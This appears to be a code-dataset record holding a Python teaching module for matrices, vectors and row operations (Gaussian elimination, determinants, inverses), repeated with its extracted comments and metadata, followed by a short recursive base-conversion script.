self]).replace("'",'') def __add__(self, matrix): '''Return self + matrix''' if not self.is_same_size(matrix): raise ValueError("Matrices not of compatable size") return Matrix([Matrix([self[i][j]+matrix[i][j] for j in range(len(self[0]))]) for i in range(len(self))]) def __radd__(self, matrix): '''Return matrix + self''' return matrix.__add__(self) def __neg__(self): 
'''Return self where each element is negated''' return Matrix([Matrix([-x for x in row]) for row in self]) def __sub__(self, matrix): '''Return self - matrix''' return self + -matrix def __rsub__(self,matrix): '''Return matrix - self''' return matrix - self def __mul__(self,value): '''return self*value (value can be matrix or constant)''' m,r = self.mn() if isinstance(value,(int,Frac)): return Matrix([Matrix([x*value for x in row]) for row in self]) r2,n = value.mn() if r != r2: raise ValueError("Matrices of incompatable sizes") return Matrix([Matrix([sum([self[i][t]*value[t][j] for t in range(r)]) for j in range(n)]) for i in range(m)]) def __rmul__(self, value): '''return value*self (value can be matrix or constant)''' if isinstance(value,(int,Frac)): return Matrix([Matrix([x*value for x in row]) for row in self]) return value.__mul__(self) def __floordiv__(self, value): '''Return self where each element x is x//value, value is int or Fraction''' return Matrix([Matrix([x//value for x in row]) for row in self]) def __div__(self, value): '''Return self where each element x is x/value, value is a constant''' return Matrix([Matrix([x/value for x in row]) for row in self]) def __pow__(self, value): '''Return self**value''' # if value is less than 0, we have to invert first, but we'll worry about this later if value > 0: M = self.copy() for i in range(value-1): M = M*self return M def print(self): '''display formatted matrix to console''' # holds format specifier for each column of self form = [max([len(str(self[i][j])) for i in range(self.m)]) for j in range(self.n)] M = [[f"{str(self[i][j]):>{form[j]}s}" for j in range(self.n)] for i in range(self.m)] print(str(M).replace('], [',']\n [').replace("'",''))#.replace(',','')) def copy(self): ''' Return a 2 level copy of self''' return Matrix([Matrix([x for x in row]) for row in self]) def is_same_size(self, matrix): '''return if self has the same number of rows and columns as matrix''' return self.mn() == matrix.mn() def 
mn(self): '''Return (row,columns) of self''' return len(self),len(self[0]) def remove_col(self,c): '''return self with column c removed''' return Matrix([[self[r][i] for i in range(self.n) if i != c] for r in range(self.m)]) def remove_row(self,r): '''return self with row r removed''' return Matrix([self[i] for i in range(self.m) if i != r]) # Row operations def swap(self,r1,r2): '''r1 <-> r2''' M = self.copy() M[r1],M[r2] = M[r2],M[r1] return M def scale(self,r1,c): '''r1 <- c*r1''' M = self.copy() M[r1] = c*M[r1] return M def pivot(self,r1,r2,c = 1): '''r1 <- r1 + c*r2''' m,n = self.mn() M = self.copy() M[r1] = M[r1]+c*M[r2] return M def row_op(self,opst): '''return matrix with row operation object or string opst applied to self''' opst = RowOp(str(opst)) if opst.op == 0: return self.swap(opst.r1,opst.r2) if opst.op == 1: return self.scale(opst.r1,opst.c) if opst.op == 2: return self.pivot(opst.r1,opst.r2,opst.c) def T(self): '''Return transpose of self''' return Matrix([[self[j][i] for j in range(len(self))] for i in range(len(self[0]))]) def REF(self, get_row_ops = False): '''Return self in a row echelon form, and the list of row operations that reduce it if get_row_ops = True.''' # Sort rows by least amount of leading zeros def leading_zeros(row,n): '''return the number of leading zeros in a list/Vector''' return n if row==[] or row[0]!=0 else leading_zeros(row[1:],n+1) def get_sort(M,start=0, ops = []): '''return M (with rows sorted by number of leading zeros) and row ops''' if start == M.m: return (M, ops) M = M.copy() leads = [leading_zeros(row,0) for row in M] r2 = leads.index(min(leads[start+1:]+[leads[start]]),start) if r2 != start: M[start],M[r2] = M[r2],M[start] ops.append(RowOp(0,start,r2)) return get_sort(M, start+1, ops) ## return Matrix(M[:start] + sorted(M[start:],key = lambda row: leading_zeros(row,0))) # if row_ops not involved M, row_ops = get_sort(self) for r in range(M.m): lead = leading_zeros(M[r],0) #where the current row's leading 1 will 
be # if zero row, no ops necessary if lead == M.n: break # Transform row so lead is 1 if M[r][lead] != 1: row_ops.append(RowOp(1,r,Frac(1,M[r][lead]))) M = M.scale(r,Frac(1,M[r][lead])) # Remove entries below for r2 in range(r+1,M.m): if M[r2][lead] == 0: break lead2 = leading_zeros(M[r2],0) row_ops.append(RowOp(2,r2,r,-M[r2][lead2])) M = M.pivot(r2,r,-M[r2][lead2]) # Sort the below by leading zeros again M,row_ops = get_sort(M,r+1, row_ops) return M if not get_row_ops else (M, row_ops) def RREF(self, get_row_ops = False): '''return self in reduced row echelon form, and the list of row operations that reduce it if get_row_ops = True''' def leading_zeros(row,n): return n if row==[] or row[0]!=0 else leading_zeros(row[1:],n+1) # put it in REF M, row_ops = self.REF(True) leads = [leading_zeros(row,0) for row in M] for r in range(M.m): for c in range(leads[r]+1,M.n): if c in leads: r2 = leads.index(c) row_ops.append(RowOp(2,r,r2, Frac(-M[r][c],M[r2][c]))) M = M.pivot(r,r2, Frac(-M[r][c],M[r2][c])) return M if not get_row_ops else (M, row_ops) def tr(self): '''return trace of self''' return sum([self[i][i] for i in range(n)]) def det(self): '''Return determinant of self if self is square''' m,n = self.mn() if n!=m: raise ValueError("This Matrix is not sqaure") if n == 1: return self[0][0] if n == 2: return self[0][0]*self[1][1] - self[0][1]*self[1][0] # row expansion return sum([self[0][j]*self.C(0,j) for j in range(n)]) def M(self,i,j): '''return the Minor of self at i,j(i.e. 
det of the matrix of self with row i and col j removed)''' return Matrix([[self[ii][jj] for jj in range(self.n) if jj != j] for ii in range(self.m) if ii!=i]).det() def C(self,i,j): '''return the cofactor of self at i,j''' return (-1)**(i+j)*self.M(i,j) def adj(self): '''return the adjoint matrix of self''' return Matrix([[self.C(j,i) for j in range(self.n)] for i in range(self.m)]) def inverse(self): '''return the inverse matrix of self if it exists''' return Frac(1,self.det()) * self.adj() def TA(self, x): '''return Matrix transformation of self*x where x is a Vector''' return self*x.col() def I(n): '''Return an n x n identity matrix''' return Matrix([[(1 if i==j else 0) for j in range(n) ] for i in range(n)]) def Elementary(n, op, *args): ''' Return elementary matrix where a row operation is performed on the identity matrix of size n. row is row number (from 1) for op to be performed on. op is op number 0-2 or 's','m','p' args following op contains either: 0/'s' (r1,r2) : r1 <-> r2 1/'m' (r1,c) : r1 <- r1*c 2/'p' (r1,r2,c) : r1 <- r1 + c*r2''' if str(op) in 'smp': op = 'smp'.find(op) if op == 0: self = I(n).swap(*args[:2]) # b is constant not row in this case if op == 1: self = I(n).scale(*args[:2]) if op == 2: self = I(n).pivot(*args) return self def ElementaryOpst(n, opst): '''Return elementary matrix where a row operation is performed on the identity matrix of size n. opst is row op string. ex "R2*-3", "R2sR3", "R2 - 3/2R3". no spaces necessary''' opst = RowOp(str(opst)) return Elementary2(n,opst.op,*opst.tuple()) class RowOp: '''Holds details about an elementary row operation to be performed on a matrix. 
These are descriptions corresponding to op numbers: 0 - Swap: two row numbers to indicate these rows to be interchanged (r1,r2) r1 <-> r2 1 - Scale: a target row, then a constant to multiply that row by (r1,c) r1 <- r1*c 2 - Pivot: a row number, a another row number, then a constant to add constant * second row to first (r1,r2,c) r1 <- r1 + c*r2''' def __init__(self, *args): '''args can be opst which is row op string. Examples: "R2*-3" -> multiply each entry in row to by constant -3 "R2sR3" -> switch rows 2 and 3 "R2 - 3/2R3" -> add -3/2 of each entry in row 3 to row 2 spaces in format are optional args can be op number (0-2), then r1,c or r1,r2 or r1,r2,c based on the number''' if len(args) == 1: if type(args[0]) == str: self.init_opst(args[0]) elif type(args[0]) == RowOp: self.init_opst(args[0].opst) else: args += (0,) self.op = op = args[0] self.r1 = args[1] self.r2,self.c = [(args[2],1), (None,args[2]), (args[2],args[3])][op] # assign self.opst self.reconstruct() def init_opst(self,opst): self.opst = opst self.op = op = ['s' in opst, '*' in opst, True].index(True) opst = opst.replace(' ','') r1,r2,c = None,None,0 if op == 0: r1,r2 = map(int,opst.replace('R','').split('s')) if op == 1: r1,c = opst[1:].split('*') r1 = int(r1) if '/' in c: a,b = map(int,c.split("/")) c = Frac(a,b) else: c = int(c) if op == 2: pm = '+-'[int('-' in opst)] r1 = int(opst[1:opst.find(pm)]) r2 = int(opst[opst.rfind("R")+1:]) c = opst[opst.find(pm):opst.rfind("R")] if '/' in c: a,b = map(int,c.split("/")) c = Frac(a,b) else: c = int(c+('1' if len(c)==1 else '')) self.r1 = r1 - 1 self.r2 = (None if not r2 else r2 - 1) self.c = c self.reconstruct() def __repr__(self): return self.opst def reconstruct(self): '''sets self.opst based on op,r1,r2,c values''' pm = "+-"[int(self.c < 0)] r1,r2 = self.r1+1, (None if self.r2 == None else self.r2+1) self.opst = [f"R{r1}sR{r2}", f"R{r1} * {self.c}", f"R{r1} {pm} {abs(self.c)}R{r2}"][self.op] def tuple(self): '''return op as tuple of form (r1,c,None), 
(r1,r2,None), or (r1,r2,c) based on self.op''' return [(self.r1,self.r2,None), (self.r1,self.c,None), (self.r1,self.r2,self.c)][self.op] def invert(self): '''Return the inverse row operation string of self''' opst = RowOp(self.opst) if opst.op == 1: opst.c = Frac(1,opst.c) if opst.op == 2: opst.c = -opst.c opst.reconstruct() return opst class Vector(list): def __init__(self, vector): # cast Vector to str if type(vector) == str: vector = list(map(Frac,vector.split())) # convert matrix of 1 col to vector if isinstance(vector[0], list): if len(vector[0]) == 1: vector = [row[0] for row in vector] else: vector = vector[0] # would be a matrix with one row super().__init__(vector) def __repr__(self): return str([str(c) for c in self]).replace("'",'') def __neg__(self): '''return -self''' return -1*self def __mul__(self, value): '''return self*value. value is a constant''' return Vector([a*value for a in self]) def __rmul__(self, value): '''return value*self. value is a constant''' return Vector([a*value for a in self]) def __add__(self, vector): '''return self+vector''' return Vector([self[i]+vector[i] for i in range(len(self))]) def __sub__(self, vector): '''return self - vector''' return self + -1*vector ## def __setitem__(self, key, value): ## '''set self[key] to value''' ## self[key] = Frac(value) def norm(self): '''return the norm (length) of self''' return sqrt(self.normsq()) def normsq(self): '''return the norm^2 of self''' return sum([v**2 for v in self]) def unit(self): '''return unit vector of self''' return (1/self.norm())*self def dot(self,vector): '''return dot product of self and vector''' return sum([self[i]*vector[i] for i in range(len(self))]) def angle(self,vector): '''return angle between two vectors in radians''' return acos( self.dot(vector) / (self.norm()*vector.norm()) ) def dangle(self,vector): '''return angle between self and vector in degrees''' return degrees(self.angle(vector)) def cross(self,vector): '''return self x vector''' M = 
Matrix([self,vector]) return Vector([M.remove_col(0).det(),-M.remove_col(1).det(),M.remove_col(2).det()]) def lagrange(self,vector): '''return length of self cross vector using lagrange identity''' return sqrt( self.norm()**2 * vector.norm()**2 - self.dot(vector)**2 ) def proj_len(self, vector): ''''return the length of the projection of self onto vector; proj vector self''' return (self.dot(vector)/vector.norm())#Frac(self.dot(a),a.norm()) def proj(self,vector): '''return projection of self onto vector; proj vector self''' return Vector([Frac(self.dot(vector),vector.normsq())*c for c in vector]) def col(self): '''return self as a column matrix''' return Matrix([[a] for a in self]) def row(self): '''return self as a row matrix''' return Matrix([self]) def mul_list(matrices): '''multiply each matrix in order''' M = matrices[0].copy() for E in matrices[1:]: M = M*E return M def apply_ops(M, row_ops): '''return a matrix where a list of RowOps or opst are applied to M in order''' M = M.copy() for op in row_ops: M = M.row_op(op) return M if __name__ == "__main__": #RREF A = Matrix([[0,3,-1,2,-5], [3,6,9,-3,15], [3,9,8,-1,10]]) A.REF().print() A.RREF().print() print() A = Matrix([[0,0,0,2,1,9],[0,-2,-6,2,0,2],[0,2,6,-2,2,0],[0,3,9,2,2,19]]) A.REF().print() A.RREF().print() ## x = Vector([[0,2,0]]) ## y = Vector([[0,0,3]]) ## u = Vector(x-2*y) ## v = Vector(2*x+3*y) ## print(v.norm()) ## print(u.norm()) ## angle = v.angle(u) ## print(angle) ## ## optests = ["R2-3/2R3","R2sR3","R2*-3/4"] ## for op in optests: ## op = RowOp(op) ## print(op,op.invert())
## matrix ## ## June, 2021 ## ## By <NAME> ## ''' This module contains Matrix, Vector, and RowOp classes. Matrix objects store entries as fractions and implement matrix operations. Matrix also does more like RREF function implements Gaussian elimination/row reduction to return a matrix in reduced row echelon form. Vector is a subclass of Matrix that implements vector operations. RowOp is a class that breaks down a row operation string to make performing row operations simpler. For example, if the user wants to add 3 * row 2 to row 1 of a 4x5 Matrix M, they can simply pass "R1 + 3*R2" into M.rowop() and the string will be given meaning by the RowOp class. ''' from fractions import Fraction as Frac from math import * # Some math functions for returning values in degrees def dcos(x): return cos(radians(x)) def dtan(x): return tan(radians(x)) def dsin(x): return sin(radians(x)) def dacos(x): return degrees(acos(x)) def dasin(x): return degrees(asin(x)) def datan(x): return degrees(atan(x)) class Matrix(list): '''2D matrix object implements matrix operations and functions Matrix can be initialized by passing a 2D array or a string of form "a b c\nd e f" where a-c are entries of first row and d-f are entries of second row ''' def __init__(self,matrix): super().__init__(matrix) # make each row a Matrix if self and type(self[0]) == list: for i in range(len(self)): self[i] = Matrix([Frac(a) for a in self[i]]) # initialize n,m if matrix is 2D if self and isinstance(self[0],list): self.m,self.n = self.mn() def __repr__(self): return str([[str(c) for c in row] for row in self]).replace("'",'') def __add__(self, matrix): '''Return self + matrix''' if not self.is_same_size(matrix): raise ValueError("Matrices not of compatable size") return Matrix([Matrix([self[i][j]+matrix[i][j] for j in range(len(self[0]))]) for i in range(len(self))]) def __radd__(self, matrix): '''Return matrix + self''' return matrix.__add__(self) def __neg__(self): '''Return self where each element is 
negated''' return Matrix([Matrix([-x for x in row]) for row in self]) def __sub__(self, matrix): '''Return self - matrix''' return self + -matrix def __rsub__(self,matrix): '''Return matrix - self''' return matrix - self def __mul__(self,value): '''return self*value (value can be matrix or constant)''' m,r = self.mn() if isinstance(value,(int,Frac)): return Matrix([Matrix([x*value for x in row]) for row in self]) r2,n = value.mn() if r != r2: raise ValueError("Matrices of incompatable sizes") return Matrix([Matrix([sum([self[i][t]*value[t][j] for t in range(r)]) for j in range(n)]) for i in range(m)]) def __rmul__(self, value): '''return value*self (value can be matrix or constant)''' if isinstance(value,(int,Frac)): return Matrix([Matrix([x*value for x in row]) for row in self]) return value.__mul__(self) def __floordiv__(self, value): '''Return self where each element x is x//value, value is int or Fraction''' return Matrix([Matrix([x//value for x in row]) for row in self]) def __div__(self, value): '''Return self where each element x is x/value, value is a constant''' return Matrix([Matrix([x/value for x in row]) for row in self]) def __pow__(self, value): '''Return self**value''' # if value is less than 0, we have to invert first, but we'll worry about this later if value > 0: M = self.copy() for i in range(value-1): M = M*self return M def print(self): '''display formatted matrix to console''' # holds format specifier for each column of self form = [max([len(str(self[i][j])) for i in range(self.m)]) for j in range(self.n)] M = [[f"{str(self[i][j]):>{form[j]}s}" for j in range(self.n)] for i in range(self.m)] print(str(M).replace('], [',']\n [').replace("'",''))#.replace(',','')) def copy(self): ''' Return a 2 level copy of self''' return Matrix([Matrix([x for x in row]) for row in self]) def is_same_size(self, matrix): '''return if self has the same number of rows and columns as matrix''' return self.mn() == matrix.mn() def mn(self): '''Return (row,columns) of 
self''' return len(self),len(self[0]) def remove_col(self,c): '''return self with column c removed''' return Matrix([[self[r][i] for i in range(self.n) if i != c] for r in range(self.m)]) def remove_row(self,r): '''return self with row r removed''' return Matrix([self[i] for i in range(self.m) if i != r]) # Row operations def swap(self,r1,r2): '''r1 <-> r2''' M = self.copy() M[r1],M[r2] = M[r2],M[r1] return M def scale(self,r1,c): '''r1 <- c*r1''' M = self.copy() M[r1] = c*M[r1] return M def pivot(self,r1,r2,c = 1): '''r1 <- r1 + c*r2''' m,n = self.mn() M = self.copy() M[r1] = M[r1]+c*M[r2] return M def row_op(self,opst): '''return matrix with row operation object or string opst applied to self''' opst = RowOp(str(opst)) if opst.op == 0: return self.swap(opst.r1,opst.r2) if opst.op == 1: return self.scale(opst.r1,opst.c) if opst.op == 2: return self.pivot(opst.r1,opst.r2,opst.c) def T(self): '''Return transpose of self''' return Matrix([[self[j][i] for j in range(len(self))] for i in range(len(self[0]))]) def REF(self, get_row_ops = False): '''Return self in a row echelon form, and the list of row operations that reduce it if get_row_ops = True.''' # Sort rows by least amount of leading zeros def leading_zeros(row,n): '''return the number of leading zeros in a list/Vector''' return n if row==[] or row[0]!=0 else leading_zeros(row[1:],n+1) def get_sort(M,start=0, ops = []): '''return M (with rows sorted by number of leading zeros) and row ops''' if start == M.m: return (M, ops) M = M.copy() leads = [leading_zeros(row,0) for row in M] r2 = leads.index(min(leads[start+1:]+[leads[start]]),start) if r2 != start: M[start],M[r2] = M[r2],M[start] ops.append(RowOp(0,start,r2)) return get_sort(M, start+1, ops) ## return Matrix(M[:start] + sorted(M[start:],key = lambda row: leading_zeros(row,0))) # if row_ops not involved M, row_ops = get_sort(self) for r in range(M.m): lead = leading_zeros(M[r],0) #where the current row's leading 1 will be # if zero row, no ops necessary if 
lead == M.n: break # Transform row so lead is 1 if M[r][lead] != 1: row_ops.append(RowOp(1,r,Frac(1,M[r][lead]))) M = M.scale(r,Frac(1,M[r][lead])) # Remove entries below for r2 in range(r+1,M.m): if M[r2][lead] == 0: break lead2 = leading_zeros(M[r2],0) row_ops.append(RowOp(2,r2,r,-M[r2][lead2])) M = M.pivot(r2,r,-M[r2][lead2]) # Sort the below by leading zeros again M,row_ops = get_sort(M,r+1, row_ops) return M if not get_row_ops else (M, row_ops) def RREF(self, get_row_ops = False): '''return self in reduced row echelon form, and the list of row operations that reduce it if get_row_ops = True''' def leading_zeros(row,n): return n if row==[] or row[0]!=0 else leading_zeros(row[1:],n+1) # put it in REF M, row_ops = self.REF(True) leads = [leading_zeros(row,0) for row in M] for r in range(M.m): for c in range(leads[r]+1,M.n): if c in leads: r2 = leads.index(c) row_ops.append(RowOp(2,r,r2, Frac(-M[r][c],M[r2][c]))) M = M.pivot(r,r2, Frac(-M[r][c],M[r2][c])) return M if not get_row_ops else (M, row_ops) def tr(self): '''return trace of self''' return sum([self[i][i] for i in range(n)]) def det(self): '''Return determinant of self if self is square''' m,n = self.mn() if n!=m: raise ValueError("This Matrix is not sqaure") if n == 1: return self[0][0] if n == 2: return self[0][0]*self[1][1] - self[0][1]*self[1][0] # row expansion return sum([self[0][j]*self.C(0,j) for j in range(n)]) def M(self,i,j): '''return the Minor of self at i,j(i.e. 
det of the matrix of self with row i and col j removed)''' return Matrix([[self[ii][jj] for jj in range(self.n) if jj != j] for ii in range(self.m) if ii!=i]).det() def C(self,i,j): '''return the cofactor of self at i,j''' return (-1)**(i+j)*self.M(i,j) def adj(self): '''return the adjoint matrix of self''' return Matrix([[self.C(j,i) for j in range(self.n)] for i in range(self.m)]) def inverse(self): '''return the inverse matrix of self if it exists''' return Frac(1,self.det()) * self.adj() def TA(self, x): '''return Matrix transformation of self*x where x is a Vector''' return self*x.col() def I(n): '''Return an n x n identity matrix''' return Matrix([[(1 if i==j else 0) for j in range(n) ] for i in range(n)]) def Elementary(n, op, *args): ''' Return elementary matrix where a row operation is performed on the identity matrix of size n. row is row number (from 1) for op to be performed on. op is op number 0-2 or 's','m','p' args following op contains either: 0/'s' (r1,r2) : r1 <-> r2 1/'m' (r1,c) : r1 <- r1*c 2/'p' (r1,r2,c) : r1 <- r1 + c*r2''' if str(op) in 'smp': op = 'smp'.find(op) if op == 0: self = I(n).swap(*args[:2]) # b is constant not row in this case if op == 1: self = I(n).scale(*args[:2]) if op == 2: self = I(n).pivot(*args) return self def ElementaryOpst(n, opst): '''Return elementary matrix where a row operation is performed on the identity matrix of size n. opst is row op string. ex "R2*-3", "R2sR3", "R2 - 3/2R3". no spaces necessary''' opst = RowOp(str(opst)) return Elementary2(n,opst.op,*opst.tuple()) class RowOp: '''Holds details about an elementary row operation to be performed on a matrix. 
These are descriptions corresponding to op numbers: 0 - Swap: two row numbers to indicate these rows to be interchanged (r1,r2) r1 <-> r2 1 - Scale: a target row, then a constant to multiply that row by (r1,c) r1 <- r1*c 2 - Pivot: a row number, a another row number, then a constant to add constant * second row to first (r1,r2,c) r1 <- r1 + c*r2''' def __init__(self, *args): '''args can be opst which is row op string. Examples: "R2*-3" -> multiply each entry in row to by constant -3 "R2sR3" -> switch rows 2 and 3 "R2 - 3/2R3" -> add -3/2 of each entry in row 3 to row 2 spaces in format are optional args can be op number (0-2), then r1,c or r1,r2 or r1,r2,c based on the number''' if len(args) == 1: if type(args[0]) == str: self.init_opst(args[0]) elif type(args[0]) == RowOp: self.init_opst(args[0].opst) else: args += (0,) self.op = op = args[0] self.r1 = args[1] self.r2,self.c = [(args[2],1), (None,args[2]), (args[2],args[3])][op] # assign self.opst self.reconstruct() def init_opst(self,opst): self.opst = opst self.op = op = ['s' in opst, '*' in opst, True].index(True) opst = opst.replace(' ','') r1,r2,c = None,None,0 if op == 0: r1,r2 = map(int,opst.replace('R','').split('s')) if op == 1: r1,c = opst[1:].split('*') r1 = int(r1) if '/' in c: a,b = map(int,c.split("/")) c = Frac(a,b) else: c = int(c) if op == 2: pm = '+-'[int('-' in opst)] r1 = int(opst[1:opst.find(pm)]) r2 = int(opst[opst.rfind("R")+1:]) c = opst[opst.find(pm):opst.rfind("R")] if '/' in c: a,b = map(int,c.split("/")) c = Frac(a,b) else: c = int(c+('1' if len(c)==1 else '')) self.r1 = r1 - 1 self.r2 = (None if not r2 else r2 - 1) self.c = c self.reconstruct() def __repr__(self): return self.opst def reconstruct(self): '''sets self.opst based on op,r1,r2,c values''' pm = "+-"[int(self.c < 0)] r1,r2 = self.r1+1, (None if self.r2 == None else self.r2+1) self.opst = [f"R{r1}sR{r2}", f"R{r1} * {self.c}", f"R{r1} {pm} {abs(self.c)}R{r2}"][self.op] def tuple(self): '''return op as tuple of form (r1,c,None), 
(r1,r2,None), or (r1,r2,c) based on self.op''' return [(self.r1,self.r2,None), (self.r1,self.c,None), (self.r1,self.r2,self.c)][self.op] def invert(self): '''Return the inverse row operation string of self''' opst = RowOp(self.opst) if opst.op == 1: opst.c = Frac(1,opst.c) if opst.op == 2: opst.c = -opst.c opst.reconstruct() return opst class Vector(list): def __init__(self, vector): # cast Vector to str if type(vector) == str: vector = list(map(Frac,vector.split())) # convert matrix of 1 col to vector if isinstance(vector[0], list): if len(vector[0]) == 1: vector = [row[0] for row in vector] else: vector = vector[0] # would be a matrix with one row super().__init__(vector) def __repr__(self): return str([str(c) for c in self]).replace("'",'') def __neg__(self): '''return -self''' return -1*self def __mul__(self, value): '''return self*value. value is a constant''' return Vector([a*value for a in self]) def __rmul__(self, value): '''return value*self. value is a constant''' return Vector([a*value for a in self]) def __add__(self, vector): '''return self+vector''' return Vector([self[i]+vector[i] for i in range(len(self))]) def __sub__(self, vector): '''return self - vector''' return self + -1*vector ## def __setitem__(self, key, value): ## '''set self[key] to value''' ## self[key] = Frac(value) def norm(self): '''return the norm (length) of self''' return sqrt(self.normsq()) def normsq(self): '''return the norm^2 of self''' return sum([v**2 for v in self]) def unit(self): '''return unit vector of self''' return (1/self.norm())*self def dot(self,vector): '''return dot product of self and vector''' return sum([self[i]*vector[i] for i in range(len(self))]) def angle(self,vector): '''return angle between two vectors in radians''' return acos( self.dot(vector) / (self.norm()*vector.norm()) ) def dangle(self,vector): '''return angle between self and vector in degrees''' return degrees(self.angle(vector)) def cross(self,vector): '''return self x vector''' M = 
Matrix([self,vector]) return Vector([M.remove_col(0).det(),-M.remove_col(1).det(),M.remove_col(2).det()]) def lagrange(self,vector): '''return length of self cross vector using lagrange identity''' return sqrt( self.norm()**2 * vector.norm()**2 - self.dot(vector)**2 ) def proj_len(self, vector): ''''return the length of the projection of self onto vector; proj vector self''' return (self.dot(vector)/vector.norm())#Frac(self.dot(a),a.norm()) def proj(self,vector): '''return projection of self onto vector; proj vector self''' return Vector([Frac(self.dot(vector),vector.normsq())*c for c in vector]) def col(self): '''return self as a column matrix''' return Matrix([[a] for a in self]) def row(self): '''return self as a row matrix''' return Matrix([self]) def mul_list(matrices): '''multiply each matrix in order''' M = matrices[0].copy() for E in matrices[1:]: M = M*E return M def apply_ops(M, row_ops): '''return a matrix where a list of RowOps or opst are applied to M in order''' M = M.copy() for op in row_ops: M = M.row_op(op) return M if __name__ == "__main__": #RREF A = Matrix([[0,3,-1,2,-5], [3,6,9,-3,15], [3,9,8,-1,10]]) A.REF().print() A.RREF().print() print() A = Matrix([[0,0,0,2,1,9],[0,-2,-6,2,0,2],[0,2,6,-2,2,0],[0,3,9,2,2,19]]) A.REF().print() A.RREF().print() ## x = Vector([[0,2,0]]) ## y = Vector([[0,0,3]]) ## u = Vector(x-2*y) ## v = Vector(2*x+3*y) ## print(v.norm()) ## print(u.norm()) ## angle = v.angle(u) ## print(angle) ## ## optests = ["R2-3/2R3","R2sR3","R2*-3/4"] ## for op in optests: ## op = RowOp(op) ## print(op,op.invert())
en
0.757431
## matrix ## ## June, 2021 ## ## By <NAME> ## This module contains Matrix, Vector, and RowOp classes. Matrix objects store entries as fractions and implement matrix operations. Matrix also does more like RREF function implements Gaussian elimination/row reduction to return a matrix in reduced row echelon form. Vector is a subclass of Matrix that implements vector operations. RowOp is a class that breaks down a row operation string to make performing row operations simpler. For example, if the user wants to add 3 * row 2 to row 1 of a 4x5 Matrix M, they can simply pass "R1 + 3*R2" into M.rowop() and the string will be given meaning by the RowOp class. # Some math functions for returning values in degrees 2D matrix object implements matrix operations and functions Matrix can be initialized by passing a 2D array or a string of form "a b c\nd e f" where a-c are entries of first row and d-f are entries of second row # make each row a Matrix # initialize n,m if matrix is 2D Return self + matrix Return matrix + self Return self where each element is negated Return self - matrix Return matrix - self return self*value (value can be matrix or constant) return value*self (value can be matrix or constant) Return self where each element x is x//value, value is int or Fraction Return self where each element x is x/value, value is a constant Return self**value # if value is less than 0, we have to invert first, but we'll worry about this later display formatted matrix to console # holds format specifier for each column of self #.replace(',','')) Return a 2 level copy of self return if self has the same number of rows and columns as matrix Return (row,columns) of self return self with column c removed return self with row r removed # Row operations r1 <-> r2 r1 <- c*r1 r1 <- r1 + c*r2 return matrix with row operation object or string opst applied to self Return transpose of self Return self in a row echelon form, and the list of row operations that reduce it if get_row_ops = True. 
# Sort rows by least amount of leading zeros return the number of leading zeros in a list/Vector return M (with rows sorted by number of leading zeros) and row ops ## return Matrix(M[:start] + sorted(M[start:],key = lambda row: leading_zeros(row,0))) # if row_ops not involved #where the current row's leading 1 will be # if zero row, no ops necessary # Transform row so lead is 1 # Remove entries below # Sort the below by leading zeros again return self in reduced row echelon form, and the list of row operations that reduce it if get_row_ops = True # put it in REF return trace of self Return determinant of self if self is square # row expansion return the Minor of self at i,j(i.e. det of the matrix of self with row i and col j removed) return the cofactor of self at i,j return the adjoint matrix of self return the inverse matrix of self if it exists return Matrix transformation of self*x where x is a Vector Return an n x n identity matrix Return elementary matrix where a row operation is performed on the identity matrix of size n. row is row number (from 1) for op to be performed on. op is op number 0-2 or 's','m','p' args following op contains either: 0/'s' (r1,r2) : r1 <-> r2 1/'m' (r1,c) : r1 <- r1*c 2/'p' (r1,r2,c) : r1 <- r1 + c*r2 # b is constant not row in this case Return elementary matrix where a row operation is performed on the identity matrix of size n. opst is row op string. ex "R2*-3", "R2sR3", "R2 - 3/2R3". no spaces necessary Holds details about an elementary row operation to be performed on a matrix. These are descriptions corresponding to op numbers: 0 - Swap: two row numbers to indicate these rows to be interchanged (r1,r2) r1 <-> r2 1 - Scale: a target row, then a constant to multiply that row by (r1,c) r1 <- r1*c 2 - Pivot: a row number, a another row number, then a constant to add constant * second row to first (r1,r2,c) r1 <- r1 + c*r2 args can be opst which is row op string. 
Examples: "R2*-3" -> multiply each entry in row to by constant -3 "R2sR3" -> switch rows 2 and 3 "R2 - 3/2R3" -> add -3/2 of each entry in row 3 to row 2 spaces in format are optional args can be op number (0-2), then r1,c or r1,r2 or r1,r2,c based on the number # assign self.opst sets self.opst based on op,r1,r2,c values return op as tuple of form (r1,c,None), (r1,r2,None), or (r1,r2,c) based on self.op Return the inverse row operation string of self # cast Vector to str # convert matrix of 1 col to vector # would be a matrix with one row return -self return self*value. value is a constant return value*self. value is a constant return self+vector return self - vector ## def __setitem__(self, key, value): ## '''set self[key] to value''' ## self[key] = Frac(value) return the norm (length) of self return the norm^2 of self return unit vector of self return dot product of self and vector return angle between two vectors in radians return angle between self and vector in degrees return self x vector return length of self cross vector using lagrange identity 'return the length of the projection of self onto vector; proj vector self #Frac(self.dot(a),a.norm()) return projection of self onto vector; proj vector self return self as a column matrix return self as a row matrix multiply each matrix in order return a matrix where a list of RowOps or opst are applied to M in order #RREF ## x = Vector([[0,2,0]]) ## y = Vector([[0,0,3]]) ## u = Vector(x-2*y) ## v = Vector(2*x+3*y) ## print(v.norm()) ## print(u.norm()) ## angle = v.angle(u) ## print(angle) ## ## optests = ["R2-3/2R3","R2sR3","R2*-3/4"] ## for op in optests: ## op = RowOp(op) ## print(op,op.invert())
3.966724
4
07_RSI/ch03/tostr.py
zzz0072/Python_Exercises
0
6623649
<gh_stars>0 #!/usr/bin/env python3 def toStr(num, base): digitStr = "0123456789ABCDEF" if num < base: return digitStr[num] else: return toStr(num // base, base) + digitStr[num % base] if __name__ == "__main__": print(toStr(1200, 10)) print(toStr(255, 16))
#!/usr/bin/env python3 def toStr(num, base): digitStr = "0123456789ABCDEF" if num < base: return digitStr[num] else: return toStr(num // base, base) + digitStr[num % base] if __name__ == "__main__": print(toStr(1200, 10)) print(toStr(255, 16))
fr
0.221828
#!/usr/bin/env python3
3.819789
4
common/templatetags/tools.py
riderflo85/common-framework
0
6623650
